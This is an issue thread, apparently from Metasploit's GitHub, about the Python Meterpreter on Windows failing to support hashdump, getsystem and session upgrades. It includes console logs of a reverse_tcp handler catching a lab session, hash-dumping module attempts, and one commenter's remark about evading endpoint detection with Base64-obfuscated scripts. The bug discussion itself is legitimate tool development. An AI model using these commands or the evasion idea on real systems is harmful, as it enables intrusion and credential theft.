Open FilterUnfiltered opened 6 years ago
For what platform? Linux? Did you try post/linux/gather/hashdump?
windows, and it's not compatible
Did you try any of the Windows post modules for dumping hashes?
yes, not compatible. I get the following:
meterpreter > run post/windows/gather/hashdump
[!] SESSION may not be compatible with this module.
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:41:in `run'
That looks like a bug.
That happens with basically everything that isn't in the python meterpreter help options... That or similar things, like the module freezing or just crashing the meterpreter shell entirely.
Yeah, I think it's sufficient to say post modules haven't been tested with every type of Meterpreter.
Well, maybe try upgrading to a native Meterpreter for the time being. sessions -u or post/multi/manage/shell_to_meterpreter.
It's not a shell, it's a python meterpreter. post/multi/manage/shell_to_meterpreter doesn't work and neither does sessions -u... ;(
I thought we fixed that so Meterpreters could upgrade themselves.
@wvu-r7 we did, but it doesn't support all meterpreters. IIRC, upgrading a lame meterpreter to a real meterpreter has the same issue as sessions -u, largely due to failure to auto-detect the appropriate arch / platform. There are some other bugs with sessions -u, see: #9511
I can confirm that python meterpreter on Windows does not support hashdump and getsystem. Likewise, sessions -u will not upgrade to a native meterpreter.
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.191.188:1337
[*] Sending stage (53508 bytes) to 172.16.191.153
[*] Meterpreter session 611 opened (172.16.191.188:1337 -> 172.16.191.153:49372) at 2018-06-29 00:12:30 -0400
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 611
[*] Starting interaction with 611...
meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > sysinfo
Computer : WIN-SGBSD5TQUTQ
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
Background session 611? [y/N]
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -u 611
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [611]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 611
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.188:4433
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Windows error: The system cannot find the file specified.
[-] Call stack:
[-] /pentest/exploit/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-] /pentest/exploit/metasploit-framework/lib/msf/core/post/common.rb:89:in `cmd_exec'
[-] /pentest/exploit/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in `run'
msf5 exploit(multi/handler) >
Works as expected with a real meterpreter (windows/x64/meterpreter/reverse_tcp).
:'(
I've been quite successful evading EPP and EDR detections with Base64 obfuscation on py scripts, but I have the exact same issue as described here, where the upgrade to native meterpreter is not working. Are you guys aware of any progress?
Please add the hashdump command to the python meterpreter, thanks!